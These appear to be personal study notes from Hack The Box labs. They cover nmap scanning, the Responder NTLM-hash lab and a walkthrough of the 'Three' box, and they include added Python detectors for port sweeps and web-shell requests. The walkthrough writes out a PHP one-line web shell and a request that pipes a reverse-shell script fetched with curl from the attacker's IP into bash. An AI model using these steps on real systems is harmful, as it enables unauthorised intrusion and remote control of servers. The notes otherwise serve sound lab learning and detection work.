Pentesting Notes - HACK THE BOX
Disclaimer:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaims any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserves the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed-upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
References
- https://www.linkedin.com/learning/
- Hack The Box (HTB)
**********************************************************************************
Nmap Commands
- nmap -sS -D 10.1.0.1
- sudo nmap --script vuln
Security Testing: Nmap Security Scanning:
- dig www.google.com: returns the IP address of the hostname
- TCP scan types
- sudo nmap -sV -O -F 10.0.2.4 (service version detection, OS detection, fast scan of the most common ports)
- Saving nmap output to files (-oN normal, -oX XML, -oG grepable, -oA all three formats)
- -v: verbose output, shows the scan's progress
How to check a website:
Linux commands
- ls
- cd
- grep
- su
- pwd
- whoami
- mv
- cp
- mkdir
- cat
Tools:
- Nmap
- Nikto
- Zenmap
- Threader3000
- Angry IP Scanner
- Netcat
- Hydra
- Wireshark
- DirBuster
- Burp Suite
- Metasploit
HACKTHEBOX [HTB]
HTB - Responder
Microsoft employs NTLM for authentication.
By exploiting a File Inclusion vulnerability on a web page hosted on a Windows machine, an attacker can obtain the NetNTLMv2 hash used by authentication services such as NTLM (New Technology LAN Manager) and Kerberos. The attacker uses the tool "Responder" to capture the NetNTLMv2 hash and then attempts to crack it with "John the Ripper", brute-forcing candidate passwords until one reproduces the hash and so reveals the original password.
- -p-: scans all TCP ports in the range 0-65535
- -sV: attempts to determine the version of the service running on each open port
- --min-rate: the minimum number of packets Nmap should send per second; higher values make the scan faster, at the cost of reliability on lossy or rate-limited links
- nmap -p- --min-rate 5000 -sV 10.129.37.49
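A full-range scan at --min-rate 5000, as in the command above, is loud from the target's side: one source opens connections to thousands of distinct ports on one host within seconds. The detector below is an added example, not part of the original notes or of Hack The Box. It runs a sliding-window distinct-port count over constructed SYN-log lines; the addresses 10.10.15.203 and 10.129.37.49 are the ones used in these notes, while the traffic, log format, window length and threshold are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log, one TCP SYN per line: "<ISO timestamp> <src> <dst> <dst_port>".
# The addresses are the ones from the notes above; the traffic itself is made up.
def build_sample_log():
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    # Scanner: 120 distinct ports on one host inside two seconds (a -p- style sweep).
    for i in range(120):
        ts = base + timedelta(milliseconds=16 * i)
        lines.append(f"{ts.isoformat()} 10.10.15.203 10.129.37.49 {1000 + i}")
    # Ordinary client: repeated connections to 80/443 spread over a minute.
    for i in range(30):
        ts = base + timedelta(seconds=2 * i)
        lines.append(f"{ts.isoformat()} 10.10.15.50 10.129.37.49 {443 if i % 2 else 80}")
    return lines


def detect_port_sweeps(lines, window_seconds=5, port_threshold=50):
    """Flag (src, dst) pairs that send SYNs to at least port_threshold distinct
    ports within any window_seconds interval.  Returns {(src, dst): summary}.
    A sliding window keeps the check cheap even for -p- sized sweeps."""
    syns = defaultdict(list)
    for line in lines:
        ts, src, dst, port = line.split()
        syns[(src, dst)].append((datetime.fromisoformat(ts), int(port)))

    alerts = {}
    for pair, events in syns.items():
        events.sort()
        window = deque()      # (timestamp, port) pairs inside the current window
        in_window = {}        # port -> number of SYNs to it inside the window
        peak = 0
        for ts, port in events:
            window.append((ts, port))
            in_window[port] = in_window.get(port, 0) + 1
            # Drop events older than the window before counting distinct ports.
            while ts - window[0][0] > timedelta(seconds=window_seconds):
                _, old_port = window.popleft()
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
            peak = max(peak, len(in_window))
        if peak >= port_threshold:
            span = (events[-1][0] - events[0][0]).total_seconds() or 1.0
            alerts[pair] = {
                "distinct_ports": peak,
                "syns": len(events),
                "approx_rate_per_s": round(len(events) / span, 1),
            }
    return alerts


if __name__ == "__main__":
    for (src, dst), summary in detect_port_sweeps(build_sample_log()).items():
        print(f"possible sweep {src} -> {dst}: {summary}")
```

The distinct-port count, not the raw packet count, is what separates the sweep from the busy but ordinary client, which repeats the same two ports for a minute and never trips the threshold. Lowering --min-rate stretches the same sweep over a longer time, so the window length is the knob a defender tunes against slow scans.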
File Inclusion Vulnerability
Responder
HTB - Three
- Enumeration
- nmap -sV 10.129.77.99
- To access the domain thetoppers.htb in the browser, add an entry for it in the /etc/hosts file with its IP address. /etc/hosts maps hostnames to IP addresses and is consulted before the DNS server by default, so an entry there is what lets the browser resolve the name.
- echo "10.129.77.99 thetoppers.htb" | sudo tee -a /etc/hosts
- Sub-domain enumeration
- Add an entry for this sub-domain in the /etc/hosts file as well:
- echo "10.129.77.99 s3.thetoppers.htb" | sudo tee -a /etc/hosts
- gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
- echo "10.129.11.227 thetoppers.htb" | sudo tee -a /etc/hosts (the box had a different IP in a later session; the /etc/hosts entry must match the current address, otherwise the stale entry silently sends the browser to the old one)
- apt install awscli
- aws configure
- aws --endpoint=http://s3.thetoppers.htb s3 ls
- gedit shell.php
- <?php system($_GET["cmd"]); ?>
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload,
which will connect back to our local machine on port 1337.
We will start an ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
Let's start a web server on our local machine on port 8000:
python3 -m http.server 8000
We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash
in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash
The flag can be found at /var/www/flag.txt.
cat /var/www/flag.txt
Another way to get the flag, running the commands through the web shell instead of the reverse shell:
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls+
images index.php shell.php
http://thetoppers.htb/shell.php?cmd=ls+..
flag.txt html
http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
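Because the web shell above is driven entirely through the cmd query parameter, every step of this walkthrough leaves a distinctive line in the web server's access log. The detection script below is an added example, not part of the original notes or of Hack The Box. The access-log lines are constructed from the URLs used above (client addresses and timestamps are made up), and the log format, the regular expressions and the command-name list are assumptions; it URL-decodes each query value before inspecting it, because %20 and + are exactly what the shell would see as spaces.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines; the requests mirror the URLs used in the
# walkthrough above, the client addresses and timestamps are made up.
SAMPLE_ACCESS_LOG = [
    '10.10.15.203 - - [01/Jan/2024:12:00:00 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 52',
    '10.10.15.203 - - [01/Jan/2024:12:00:05 +0000] "GET /shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash HTTP/1.1" 200 0',
    '10.10.15.203 - - [01/Jan/2024:12:00:09 +0000] "GET /shell.php?cmd=cat+../flag.txt HTTP/1.1" 200 33',
    '10.10.15.50 - - [01/Jan/2024:12:01:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
    '10.10.15.50 - - [01/Jan/2024:12:01:02 +0000] "GET /images/band.jpg HTTP/1.1" 200 40960',
]

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Characters that chain or substitute commands in a POSIX shell.
SHELL_META = re.compile(r'[|;&`]|\$\(|\$\{')
# Values that begin with a common command name (word-bounded, so "idle" is not "id").
SHELL_CMDS = re.compile(
    r'^\s*(?:id|whoami|ls|cat|pwd|uname|curl|wget|bash|sh|nc|python3?|perl)\b'
)


def suspicious_params(target):
    """Return [(param, decoded_value, reason)] for query values that look like OS commands.
    parse_qs undoes both %XX and '+' encoding, so the check sees what the shell would see."""
    findings = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                findings.append((name, value, "shell metacharacter"))
            elif SHELL_CMDS.match(value):
                findings.append((name, value, "starts with a shell command"))
    return findings


def scan_access_log(lines):
    """Return one alert per request whose query string carries a command-like value."""
    alerts = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        findings = suspicious_params(m["target"])
        if findings:
            alerts.append({
                "src": m["src"],
                "time": m["time"],
                "path": urlsplit(m["target"]).path,
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG):
        print(alert["time"], alert["src"], alert["path"], alert["findings"])
```

Detection here is the fallback, not the fix. The root cause on this box is a bucket that anonymous clients can write to while it also backs the web root, so a bucket policy that denies unauthenticated s3:PutObject, together with an alert on newly created .php objects, closes the path before the first cmd= request ever arrives.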